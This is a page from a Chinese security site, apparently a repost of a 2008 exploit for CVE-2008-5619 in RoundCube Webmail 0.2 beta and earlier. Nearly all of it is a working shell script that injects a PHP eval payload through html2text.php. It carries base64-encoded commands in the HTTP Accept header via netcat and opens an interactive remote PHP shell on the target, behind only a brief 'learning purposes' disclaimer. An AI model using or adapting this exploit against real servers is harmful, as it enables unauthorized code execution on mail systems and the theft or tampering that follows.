首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RoundCube Webmail <= 0.2b Remote Code Execution Exploit
来源:rch2tex@hunger.hu 作者:Hunger 发布时间:2008-12-24  

#!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP> echo(ini_get('disable_functions'));
#
# exec, system
#
# PHP> passthru("id; uname -a");
#
# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#

echo  'Exploit for Roundcube Webmail =< 0.2-beta'
echo  'html2text.php / preg_replace() / eval bug'
echo -e '\r\nby Hunger <rch2tex@hunger.hu>\r\n\n'

if [ "$2" = "" ]; then echo "
Usage:
$0 <hostname> <deeplink>

Example:
\$ $0 localhost /roundcube/bin/html2text.php


For https sites use stunnel or socat!
"; exit 1; fi

NETCATEXE=`which nc`
BASE64ENC=`which base64`

if [ "$NETCATEXE" = "" ] || [ "$BASE64ENC" = "" ];
then
   echo "Required tool(s) missing... (netcat, base64)"
   exit 2
fi

USERAGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"

MYPAYLOAD="{\${EVAL(BASE64_DECODE(\$_SERVER[HTTP_ACCEPT]))}}"
EVALEDTAG="<b>"
EVALEDTAG=$EVALEDTAG$MYPAYLOAD
EVALEDTAG=$EVALEDTAG"</b>"

PARAMSIZE=54

HOST_NAME=$1
DEEP_LINK=$2
HTTP_PORT=80

HTTPHEADR=""
HTTPHEADR=$HTTPHEADR"POST $DEEP_LINK HTTP/1.0\r\n"
HTTPHEADR=$HTTPHEADR"Host: $HOST_NAME\r\n"
HTTPHEADR=$HTTPHEADR"User-Agent: $USERAGENT\r\n"
HTTPHEADR=$HTTPHEADR"Content-length: $PARAMSIZE\r\n"
HTTPHEADR=$HTTPHEADR"Accept:"

SPLOITCHK='Succeeded! :))'
PHPAYLOAD='echo("'
PHPAYLOAD=$PHPAYLOAD$SPLOITCHK'\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Type PHP functions as shell commands. ;)\r\n'
PHPAYLOAD=$PHPAYLOAD'Use \"exit\" to close session.\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Good luck and have phun! ;D\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'")'

HTTPOKMSG="HTTP/1.0 200 OK"
HTTP1KMSG="HTTP/1.1 200 OK"
RETURNCHR=`echo -e "\r\n"`

echo -n "Trying to exploit... "

f=0; until [ "$PHPAYLOAD" = "exit" ]; do
 PHPAYLOAD=`echo "$PHPAYLOAD;" |$BASE64ENC --wrap=0`
 HTTP_SEND="$HTTPHEADR $PHPAYLOAD\r\n\r\n$EVALEDTAG"
 HTTP_BACK=`echo -ne "$HTTP_SEND"|$NETCATEXE $HOST_NAME $HTTP_PORT`
 if [ $? != 0 ]; then echo "Connection failed."; exit 3; fi
 e=0; l=0; echo "$HTTP_BACK" | while read i; do let l++;
   if [ $l = 1 ] && [ "$i" != "$HTTPOKMSG$RETURNCHR" ] \
                 && [ "$i" != "$HTTP1KMSG$RETURNCHR" ]; then
      echo "Bad Server Response :\\"; exit 4; fi;
   if [ $e = 1 ] && [ $f = 0 ] && [ "$i" = "$MYPAYLOAD" ]; then
      echo "Target has been patched /o\\"; exit 4; fi
   if [ $e = 1 ] && [ $f = 0 ] && [ "$i" != "$SPLOITCHK$RETURNCHR" ]; then
      echo -e "Exploitation failed :(("; exit 4; elif
         [ "$i" = "$SPLOITCHK$RETURNCHR" ]; then let f++; fi
   if [ $e -gt 0 ]; then echo "$i"; fi
   if [ "$i" = "$RETURNCHR" ]; then let e++; fi
 done
 if [ $? != 4 ]; then let f++; echo -ne "PHP> "; else
  echo -e "\n\nDump:\n\n$HTTP_BACK"; exit 4; fi;
 read PHPAYLOAD
done


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CMS NetCat 3.12 (password_reco
·CMS NetCat 3.12 (password_reco
·PGP Desktop 9.0.6 (PGPwded.sys
·Getleft 1.2 Remote Buffer Over
·Psi Jabber Client (8010/tcp) R
·Google Chrome Browser (ChromeH
·Mozilla Firefox 3.0.5 location
·FreeSSHD 1.2.1 (Post Auth) Rem
·CUPS < 1.3.8-4 (pstopdf filter
·Exploits FreeSSHd Multiple Rem
·SolarCMS 0.53.8 (Forum) Remote
·Oracle Pwnage Part 6 from DBA
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved